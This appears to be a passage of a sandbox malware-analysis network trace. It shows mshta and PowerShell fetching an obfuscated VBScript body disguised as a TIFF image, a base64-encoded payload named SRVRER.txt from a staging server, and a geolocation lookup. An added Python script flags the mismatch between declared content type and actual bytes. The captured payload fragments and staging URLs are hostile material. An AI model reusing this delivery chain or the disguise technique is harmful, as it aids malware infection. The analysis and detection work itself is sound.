Data Ascii: lOLvZxWTLHKP"fBsCZbcgAcSLJkU = "aKPxBerKrgsuNuI"tfiZfbLONCLczLG = "cZWNKukGceeobix"vikuKWLcdmbUklp = "honPWnazLZWmz
Dec 3, 2024 14:01:11.532193899 CET | 776 | IN | Data Raw: 00 57 00 6b 00 74 00 49 00 6b 00 6c 00 62 00 69 00 20 00 3d 00 20 00 22 00 74 00 48 00 6d 00 6c 00 4c 00 42 00 57 00 66 00 6f 00 62 00 50 00 69 00 65 00 6e 00 54 00 22 00 0d 00 0a 00 71 00 6b 00 52 00 6c 00 57 00 72 00 57 00 57 00 64 00 6f 00 4b
Data Ascii: WktIklbi = "tHmlLBWfobPienT"qkRlWrWWdoKUcWj = "iNRkGiKbGCCApWo"PKSIibuikcPxcua = "OKtPoRvIkktfAKe"WufGnxtiAGWChQP =
Dec 3, 2024 14:01:11.532206059 CET | 1236 | IN | Data Raw: 00 7a 00 6d 00 53 00 57 00 61 00 4f 00 62 00 69 00 47 00 43 00 70 00 22 00 0d 00 0a 00 76 00 4b 00 74 00 5a 00 64 00 6d 00 64 00 4c 00 7a 00 65 00 6a 00 47 00 63 00 57 00 57 00 20 00 3d 00 20 00 22 00 65 00 6b 00 68 00 63 00 4c 00 57 00 6c 00 43
Data Ascii: zmSWaObiGCp"vKtZdmdLzejGcWW = "ekhcLWlCGKhRLpc"lGALUWiauCLWhkP = "fNhZCALWrPUHLog"iRULsofLdlAnfWu = "QxnWfZUeWRkllj
Dec 3, 2024 14:01:11.532217026 CET | 1236 | IN | Data Raw: 00 4c 00 4c 00 71 00 7a 00 6a 00 20 00 3d 00 20 00 22 00 4c 00 55 00 73 00 55 00 50 00 62 00 69 00 62 00 4c 00 4c 00 57 00 50 00 5a 00 74 00 66 00 22 00 0d 00 0a 00 63 00 66 00 76 00 62 00 64 00 4a 00 74 00 6e 00 57 00 53 00 71 00 57 00 6b 00 48
Data Ascii: LLqzj = "LUsUPbibLLWPZtf"cfvbdJtnWSqWkHi = "WLTGLzckWLALbKZ"gNkbLWZKzhWQkLC = "GkktSmGURZzLqtG"uKWNpUWWLaPSifW =
Dec 3, 2024 14:01:11.532228947 CET | 1236 | IN | Data Raw: 00 57 00 6b 00 22 00 0d 00 0a 00 64 00 67 00 69 00 55 00 4e 00 50 00 4c 00 42 00 4c 00 41 00 4c 00 66 00 55 00 5a 00 69 00 20 00 3d 00 20 00 22 00 51 00 6c 00 4b 00 6f 00 68 00 4e 00 5a 00 62 00 47 00 55 00 49 00 63 00 63 00 55 00 43 00 22 00 0d
Data Ascii: Wk"dgiUNPLBLALfUZi = "QlKohNZbGUIccUC"WNxLvWeKhLmzRUp = "ZeUkeWiiifgGCnv"cWKqPxaUmpZgihA = "WnKUJhWhdPcQLml"lKLdA
Dec 3, 2024 14:01:11.757045031 CET | 1236 | IN | Data Raw: 00 20 00 22 00 55 00 57 00 47 00 65 00 71 00 68 00 4e 00 6b 00 4c 00 74 00 6f 00 70 00 68 00 78 00 57 00 22 00 0d 00 0a 00 6f 00 74 00 7a 00 63 00 47 00 4e 00 69 00 6d 00 4e 00 69 00 68 00 4b 00 4b 00 48 00 6b 00 20 00 3d 00 20 00 22 00 4c 00 76
Data Ascii: "UWGeqhNkLtophxW"otzcGNimNihKKHk = "LvZmjLmcIARxWPK"jciGiZuWKNGQWAW = "fhkWKmflipLWHPJ"ehQncLLeWOcKGLu = "ZqbihZWa
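
The security-relevant point in session 2 above is that powershell.exe fetched a file with a .tIF extension that the server labelled image/tiff, while the body begins ff fe 0d 00 0a 00 (a UTF-16LE byte-order mark followed by CR LF) and decodes to VBScript-style string assignments rather than a TIFF image; a real TIFF begins with the bytes "II*\0" or "MM\0*". The script below is an added example and is not part of the Joe Sandbox report or of the sample's own code. It checks a captured HTTP response's declared Content-Type against the magic bytes of its body, decodes UTF-16 text behind a BOM, and flags script-style content or an unbroken base64-alphabet blob (the shape of the text/plain SRVRER.txt response in session 4 of this trace). The sample bodies are constructed from the bytes shown in the trace; the length of the leading run of "A" characters in the second sample is illustrative, not the real length. The magic-number table is standard file-signature knowledge, not something the report states.

```python
"""Declared-type versus actual-content check for a captured HTTP response.

Added example, not part of the sandbox report. Sample bodies are constructed
from the bytes shown in the trace (session 2 .tIF response, session 4
SRVRER.txt response); the run length of 'A' in the second sample is illustrative.
"""
from __future__ import annotations

import re

# Leading bytes (magic numbers) for content types a stager might claim.
MAGIC: dict[str, tuple[bytes, ...]] = {
    "image/tiff": (b"II*\x00", b"MM\x00*"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "application/pdf": (b"%PDF-",),
}

# Bytes accepted as plain ASCII text: printable range plus TAB, LF, CR.
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

# One  name = "value"  line, the shape seen in the decoded .tIF body.
ASSIGN_RE = re.compile(r'^\s*[A-Za-z_]\w*\s*=\s*"[^"\r\n]*"\s*$', re.MULTILINE)
# An unbroken run of base64-alphabet characters, the shape of SRVRER.txt.
B64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{64,}$")


def declared_type(headers: dict[str, str]) -> str:
    """Media type from Content-Type, parameters stripped, lower-cased."""
    return headers.get("Content-Type", "").split(";")[0].strip().lower()


def decode_text(body: bytes) -> str | None:
    """Decode the body as text if it has a UTF-16 BOM or is printable ASCII."""
    if body.startswith(b"\xff\xfe"):
        return body[2:].decode("utf-16-le", errors="replace")
    if body.startswith(b"\xfe\xff"):
        return body[2:].decode("utf-16-be", errors="replace")
    if body and all(b in PRINTABLE for b in body):
        return body.decode("ascii")
    return None


def check_response(headers: dict[str, str], body: bytes) -> list[str]:
    """Return findings where the declared type disagrees with the content."""
    findings: list[str] = []
    ct = declared_type(headers)
    magic = MAGIC.get(ct)
    if magic is not None and not body.startswith(magic):
        findings.append(f"body lacks the {ct} magic bytes")
    text = decode_text(body)
    if text is None:
        return findings
    if ct.startswith("image/"):
        findings.append("body decodes as text under an image/* content type")
    if len(ASSIGN_RE.findall(text)) >= 3:
        findings.append("body contains script-style string assignments")
    if ct == "text/plain" and B64_BLOB_RE.match(text.strip()):
        findings.append("text/plain body is one unbroken base64-alphabet blob")
    return findings


# Constructed sample 1: first bytes of the image/tiff response in session 2.
TIFF_HEADERS = {"Content-Type": "image/tiff", "Content-Length": "153968"}
TIFF_BODY = b"\xff\xfe" + (
    "\r\n    \r\n"
    'cbusjOLZcmWJGaf = "iLZLUhnUkULULWo"\r\n'
    'oitKUWiIGLKiSKa = "KiLdNLmcKLjLaqA"\r\n'
    'hdaLOLLAaLPpkLi = "WoKixKLZumtAdzb"\r\n'
).encode("utf-16-le")

# Constructed sample 2: start of the text/plain SRVRER.txt response
# (a run of 'A' followed by base64-alphabet characters); run length illustrative.
TXT_HEADERS = {"Content-Type": "text/plain"}
TXT_BODY = b"A" * 160 + b"wD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoD"

# Constructed sample 3: a genuine little-endian TIFF header, for contrast.
REAL_TIFF_BODY = b"II*\x00\x08\x00\x00\x00" + b"\x00" * 8


if __name__ == "__main__":
    for label, hdrs, body in (("session 2 .tIF", TIFF_HEADERS, TIFF_BODY),
                              ("session 4 SRVRER.txt", TXT_HEADERS, TXT_BODY),
                              ("real TIFF", TIFF_HEADERS, REAL_TIFF_BODY)):
        print(label, "->", check_response(hdrs, body) or ["no findings"])
```

Run against the session 2 bytes the check reports all three findings (no TIFF magic, text under image/*, script-style assignments); the SRVRER.txt sample reports only the base64-blob finding, and a genuine TIFF header reports nothing. On a proxy or sandbox feed this is a cheap pre-filter: a content-type that disagrees with the first bytes is worth a closer look before any signature matching.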


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.22  49175        142.93.65.161   80                4084  C:\Windows\System32\mshta.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:21.986196041 CET | 493 | OUT | GET /xampp/ws/niceworkingpersonwithhergirlfriendsheisbeautiful.hta HTTP/1.1
Accept: */*
Accept-Language: fr-FR
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Tue, 03 Dec 2024 05:33:52 GMT
Connection: Keep-Alive
Host: 142.93.65.161
If-None-Match: "26ff2-6285702adf515"
Dec 3, 2024 14:01:23.117733002 CET | 275 | IN | HTTP/1.1 304 Not Modified
Date: Tue, 03 Dec 2024 13:01:22 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 03 Dec 2024 05:33:52 GMT
ETag: "26ff2-6285702adf515"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.22  49177        142.93.65.161   80                3984  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:38.667897940 CET | 77 | OUT | GET /680/SRVRER.txt HTTP/1.1
Host: 142.93.65.161
Connection: Keep-Alive
Dec 3, 2024 14:01:39.948823929 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 13:01:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Tue, 03 Dec 2024 05:29:15 GMT
ETag: "a0800-62856f223f03a"
Accept-Ranges: bytes
Content-Length: 657408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                                                                                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
Dec 3, 2024 14:01:39.948841095 CET | 1236 | IN | Data Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
    Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
Dec 3, 2024 14:01:39.948860884 CET | 1236 | IN | Data Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
    Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
Dec 3, 2024 14:01:39.948872089 CET | 1236 | IN | Data Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
    Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
Dec 3, 2024 14:01:39.948882103 CET | 1236 | IN | Data Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
    Data Ascii: 5DZ+wlPU5DT+QkP84DN+wiPk4DH+QhPM4DB9wfP03D79QePc3D19wcPE3Dv9QbPs2Dp9wZPU2Dj9QYP81Dd9wWPk1DX9QVPM1DR9wTP00DL9QSPc0DF9wQPEwD/8QPPszD58wNPUzDz8QMP8yDt8wKPkyDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl
Dec 3, 2024 14:01:39.948894024 CET | 1236 | IN | Data Raw: 51 50 41 41 45 41 77 41 55 41 63 41 41 41 41 2f 51 78 50 4b 38 44 41 2b 59 76 50 73 37 6a 34 2b 67 74 50 4f 37 44 78 2b 6f 72 50 77 36 6a 70 2b 77 70 50 53 36 44 69 2b 34 6e 50 30 35 6a 61 2b 41 6d 50 57 35 44 54 2b 49 6b 50 34 34 6a 4c 2b 51 69
    Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
Dec 3, 2024 14:01:39.948906898 CET | 776 | IN | Data Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
    Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
Dec 3, 2024 14:01:39.948919058 CET | 1236 | IN | Data Raw: 4a 6a 51 79 73 52 4d 69 48 7a 77 78 63 54 4d 48 41 44 36 77 77 4d 4d 4d 43 6a 64 41 41 41 41 41 43 41 42 67 43 41 41 41 38 44 38 2f 38 39 50 4b 2f 7a 6c 2f 55 7a 50 75 34 7a 59 2b 77 31 4f 73 6f 6a 4d 35 77 61 4f 59 68 54 64 34 38 47 4f 64 68 54
    Data Ascii: JjQysRMiHzwxcTMHAD6wwMMMCjdAAAAACABgCAAA8D8/89PK/zl/UzPu4zY+w1OsojM5waOYhTd48GOdhTI4YxNCezM3EgNRTj00QLNtSTl04IN/Rzb0gGNpEjXAAAAIBABQCAP0wDG6svOFrjG6oQOwmTj5cVOFljD4MNO4iDi480NafDz3c8N6eDp344NHejZ3k0NDZTG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDI
Dec 3, 2024 14:01:39.948929071 CET | 224 | IN | Data Raw: 55 65 4e 5a 57 54 64 31 67 44 4e 79 54 44 32 30 45 4c 4e 39 52 6a 4e 30 30 43 4e 63 4d 7a 39 7a 38 39 4d 58 50 7a 79 7a 6b 37 4d 67 4f 44 6d 7a 45 35 4d 44 4f 6a 64 7a 45 33 4d 6b 4e 7a 58 7a 59 31 4d 49 4e 6a 51 7a 63 7a 4d 78 4d 6a 4a 7a 34 78
    Data Ascii: UeNZWTd1gDNyTD20ELN9RjN00CNcMz9z89MXPzyzk7MgODmzE5MDOjdzE3MkNzXzY1MINjQzczMxMjJz4xMTMTDywvM3LD6yUrMiKDjyAoMzJjbygjMmEj4xQWMNBztw0GMVBjBAAAAoCABwAAAA8z+/I6PB6j2+koP15ja+8lPa5DU+skPx4jF9kePR3Tm9MXPW1DI8YPPXrTu6QrOGqTZ6AmOtojJ6
Dec 3, 2024 14:01:39.949811935 CET | 1236 | IN | Data Raw: 63 51 4f 39 6e 7a 39 35 67 64 4f 4f 66 6a 32 33 38 38 4e 57 65 54 6a 33 49 79 4e 63 63 6a 46 33 77 67 4e 34 61 44 70 32 34 70 4e 4d 61 44 54 32 45 6a 4e 66 59 6a 44 32 55 51 4e 37 58 7a 38 31 45 65 4e 5a 57 44 6b 31 34 58 4e 33 56 54 44 30 77 50
    Data Ascii: cQO9nz95gdOOfj2388NWeTj3IyNccjF3wgN4aDp24pNMaDT2EjNfYjD2UQN7Xz81EeNZWDk14XN3VTD0wPN3Tz60YONTTzx0AMNpSzk00HNuRjP0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPA
Dec 3, 2024 14:01:40.130892038 CET | 1236 | IN | Data Raw: 44 6a 39 77 49 50 4d 75 44 6a 36 77 59 4f 4d 69 44 6a 33 77 6f 4e 4d 57 44 6a 30 77 34 4d 41 41 41 41 71 41 4d 41 63 41 55 44 47 78 41 42 4d 59 43 54 68 41 41 41 41 51 41 77 41 67 42 51 50 73 33 44 36 39 51 65 50 67 33 7a 32 39 59 5a 50 41 31 44
    Data Ascii: Dj9wIPMuDj6wYOMiDj3woNMWDj0w4MAAAAqAMAcAUDGxABMYCThAAAAQAwAgBQPs3D69QePg3z29YZPA1DP9gTP00zL9gCPxvzQ7UzOXsDB4wGOohDZ4AGObhjF3A8N8eDu3Q7NveDq3EXNDXTt1cZNESz30wLNbSTl0UINcRzMzYrMmLzbysiMeIzFyEhMLEj+x8dMXHTyxMcM7GjpxkZMJGTexYWMgFjUxgTMVAj7wgNMSDDx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49180 | 178.237.33.50 | 80 | 1200 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:45.326936960 CET | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Dec 3, 2024 14:01:46.425509930 CET | 1171 | IN | HTTP/1.1 200 OK
    date: Tue, 03 Dec 2024 13:01:46 GMT
    server: Apache
    content-length: 963
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
    Data Ascii:
    {
      "geoplugin_request":"8.46.123.228",
      "geoplugin_status":200,
      "geoplugin_delay":"1ms",
      "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
      "geoplugin_city":"New York",
      "geoplugin_region":"New York",
      "geoplugin_regionCode":"NY",
      "geoplugin_regionName":"New York",
      "geoplugin_areaCode":"",
      "geoplugin_dmaCode":"501",
      "geoplugin_countryCode":"US",
      "geoplugin_countryName":"United States",
      "geoplugin_inEU":0,
      "geoplugin_euVATrate":false,
      "geoplugin_continentCode":"NA",
      "geoplugin_continentName":"North America",
      "geoplugin_latitude":"40.7123",
      "geoplugin_longitude":"-74.0068",
      "geoplugin_locationAccuracyRadius":"20",
      "geoplugin_timezone":"America\/New_York",
      "geoplugin_currencyCode":"USD",
      "geoplugin_currencySymbol":"$",
      "geoplugin_currencySymbol_UTF8":"$",
      "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49181 | 142.93.65.161 | 80 | 2112 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:01:52.846601963 CET | 77 | OUT | GET /680/SRVRER.txt HTTP/1.1
    Host: 142.93.65.161
    Connection: Keep-Alive
Dec 3, 2024 14:01:53.979757071 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Tue, 03 Dec 2024 13:01:53 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Tue, 03 Dec 2024 05:29:15 GMT
    ETag: "a0800-62856f223f03a"
    Accept-Ranges: bytes
    Content-Length: 657408
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain
                                                                                                                                                                                  Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44 6f 7a 51 7a 4d 77 49 44 70 79 41 71 4d 45 4b 44 67 79 77 6e 4d 77 4a 44 57 79 67 6b 4d 34 49 44 4b 79 67 52 4d 6f 48 44 32 78 51 64 4d 51 48 44 7a 78 67 63 4d 45 48 44 77 78 77 62 4d 34 47 44 72 78 67 61 4d 6b 47 44 6f 78 77 5a 4d 59 47 44 6c 78 41 [TRUNCATED]
Dec 3, 2024 14:01:53.979825020 CET | 1236 | IN | Data Raw: 67 4a 41 47 41 4e 41 41 41 41 50 77 79 44 6d 38 41 4a 50 4d 79 44 69 38 67 48 50 30 78 44 5a 38 77 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 67 77 44 48 38 77 77 4f 30 76 44 37 37 67 2b 4f 6b 76 44 34 37 77 39 4f 59 76 44 79 37 51 38
    Data Ascii: gJAGANAAAAPwyDm8AJPMyDi8gHP0xDZ8wEPExDQ8wDP4wDN8ADPgwDH8wwO0vD77g+OkvD47w9OYvDy7Q8O0uDn7Q5OQuDj7g4OEuDd7A3OgtDS7A0O8sDO7QzOwsDI7wxOMoD96wuOorD56QtOQrDw6wrOsqDl6woOIqDe6AmOYpDV6AlOMpDP6QiOgoDC6AQO8nD+5QfOwnD45wdOMnDt5waOomDm5QZOEmDb5QWOglDX5wUO
Dec 3, 2024 14:01:53.979839087 CET | 1236 | IN | Data Raw: 6e 44 32 35 41 64 4f 49 6e 44 77 35 67 62 4f 77 6d 44 71 35 41 61 4f 59 6d 44 6b 35 67 59 4f 41 6d 44 65 35 41 58 4f 6f 6c 44 59 35 67 56 4f 51 6c 44 53 35 41 55 4f 34 6b 44 4d 35 67 53 4f 67 6b 44 47 35 41 52 4f 49 6b 44 41 34 67 50 4f 77 6a 44
    Data Ascii: nD25AdOInDw5gbOwmDq5AaOYmDk5gYOAmDe5AXOolDY5gVOQlDS5AUO4kDM5gSOgkDG5AROIkDA4gPOwjD6AAQAQDQBwDAAA4D5+wtPU7Dz+QsP86Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99wePk3D39QdPM3Dx9wbP02Dr9QaPc2Dl9wYPE2Df9QXPs1DZ9wVPU1DT9QUP80DN
Dec 3, 2024 14:01:53.980019093 CET | 1236 | IN | Data Raw: 77 4a 50 59 79 44 6c 38 41 4a 50 4d 79 44 69 38 51 49 50 41 79 44 66 38 67 48 50 30 78 44 63 38 77 47 50 6f 78 44 5a 38 41 47 50 63 78 44 57 38 51 46 50 51 78 44 54 38 67 45 50 45 78 44 51 38 77 44 50 34 77 44 4e 38 41 44 50 73 77 44 4b 38 51 43
    Data Ascii: wJPYyDl8AJPMyDi8QIPAyDf8gHP0xDc8wGPoxDZ8AGPcxDW8QFPQxDT8gEPExDQ8wDP4wDN8ADPswDK8QCPgwDH8gBPUwDE8wAPIwDB8AwO8vD+AAAAgDQBADAAA0Dx9AcP82Du9QbPw2Dr9gaPk2Do9wZPY2Dl9AZPM2Di9AYP81De9QXPw1Db9QWPY1DV9AVPM1DS9QUPA1DP9QTPw0DL9gSPk0DI9wRPY0DE9gAAAAAXAUAs
Dec 3, 2024 14:01:53.980031967 CET | 1236 | IN | Data Raw: 35 44 5a 2b 77 6c 50 55 35 44 54 2b 51 6b 50 38 34 44 4e 2b 77 69 50 6b 34 44 48 2b 51 68 50 4d 34 44 42 39 77 66 50 30 33 44 37 39 51 65 50 63 33 44 31 39 77 63 50 45 33 44 76 39 51 62 50 73 32 44 70 39 77 5a 50 55 32 44 6a 39 51 59 50 38 31 44
